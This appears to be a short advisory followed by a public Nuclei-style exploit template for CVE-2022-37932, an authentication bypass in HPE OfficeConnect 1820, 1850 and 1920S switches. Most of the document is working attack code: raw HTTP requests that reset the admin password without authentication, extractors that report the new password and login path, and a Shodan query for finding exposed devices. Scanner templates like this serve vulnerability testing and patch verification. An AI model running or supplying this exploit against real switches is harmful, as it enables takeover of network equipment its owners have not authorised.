A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
PoC代码[已公开]
id: CVE-2022-37932
info:
name: HP Switch - Authentication Bypass
author: Phulelouch
severity: high
description: |
A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions- Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-37932
epss-score: 0.7457
epss-percentile: 0.98814
cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: hpe
product: officeconnect_1820_j9979a_firmware
shodan-query: html:"HPE OfficeConnect"
tags: cve,cve2022,hp,officeconnect,auth-bypass,intrusive
variables:
password: "{{rand_base(8)}}"
flow: http(1) && http(2) || http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '<title>HPE OfficeConnect Switch 1920')"
condition: and
internal: true
- raw:
- |
POST /login/default_password_cfg.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "redirect")'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: json
name: redirect
part: body
json:
- .redirect
internal: true
- type: dsl
dsl:
- '"Password:"+ password'
- '"Login Path:"+ redirect'
- raw:
- |
POST /htdocs/login/default_password_cfg.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&oldPwd=&newPwd={{password}}&confirmPwd={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "redirect")'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: json
name: redirect
part: body
json:
- .redirect
internal: true
- type: dsl
dsl:
- '"Password:"+ password'
- '"Login Path:"+ redirect'
# digest: 4a0a004730450220389241cb163e302e9cc896c9b2afd22003d8afac57dcfb7b12d599e91bff6199022100a30397c7a651808af57c0ac423db8d8a35b79a561dea4a70eea2966e8c258013:922c64590222798bb761d5b6d8e72950